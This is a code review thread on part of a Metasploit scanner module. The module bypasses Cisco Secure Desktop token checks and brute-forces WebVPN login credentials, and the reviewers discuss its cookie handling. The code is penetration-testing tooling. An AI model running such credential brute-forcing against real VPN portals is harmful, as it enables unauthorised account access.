modules/auxiliary/scanner/http/cisco_secure_desktop.rb

```diff
@@ -0,0 +1,337 @@
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def get_token_cookie()
+    vprint_status("Requesting a session token...")
+    res = send_request_raw(
+            'uri' => '/+CSCOE+/sdesktop/token.xml',
+            'method' => 'GET',
+            'headers' => {
+               'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+               'Accept-Language' => 'en-US,en;q=0.5',
+               'Referer' => "https://#{rhost}:#{rport}/CACHE/sdesktop/install/start.htm",
+               'Cookie' => 'webvpnlogin=1; webvpnLang=en',
+              }
+          )
+
+    if res &&
+       res.code == 200
+
+      token = res.body.scan(/<token>([A-Z0-9]{24})/).flatten[0]
+
+    end
+
+    vprint_status("Verifying the session token...")
+    res = send_request_raw(
+            'uri' => '/+CSCOE+/sdesktop/scan.xml',
+            'method' => 'POST',
+            'data' => "endpoint.os.version=Linux;\nendpoint.feature=failure;",
+            'ctype' => 'text/plain; charset=UTF-8',
+            'headers' => {
+               'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+               'Accept-Language' => 'en-US,en;q=0.5',
+               'Referer' => "https://#{rhost}:#{rport}/CACHE/sdesktop/install/start.htm",
+               'Cookie' => "webvpnlogin=1; webvpnLang=en; sdesktop=#{token};"
+              }
+          )
+
+    if res &&
+       res.code == 200
+
+      return token
+    end
+  end
+
+  # Brute-force the login page
+  def do_login(user, pass, group)
+    vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}")
+
+    begin
+      post_params = {
+        'tgroup'  => '',
+        'next'    => '',
+        'tgcookieset' => '',
+        'username' => user,
+        'password' => pass,
+        'Login'   => 'Login'
+       }
+
+      post_params['group_list'] = group unless group.empty?
+
+      res = send_request_cgi(
+              'uri' => '/+webvpn+/index.html',
+              'method' => 'POST',
+              'ctype' => 'application/x-www-form-urlencoded',
+              'vars_post' => post_params,
+              'headers' => {
+                 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+                 'Accept-Language' => 'en-US,en;q=0.5',
+                 'Referer' => "https://#{rhost}:#{rport}/+CSCOE+/logon.html",
+                 'Cookie' => "webvpnlogin=1; webvpnLang=en; sdesktop=#{$sdesktop_cookie};"
```

Comment:
`send_request_cgi` supports a `cookie` property, rather than specifying the `cookie` as a `headers` key.

I believe this is preferred.

Reply:
Seems pedantic.

Reply:
...thou I do appreciate all the suggestions. :D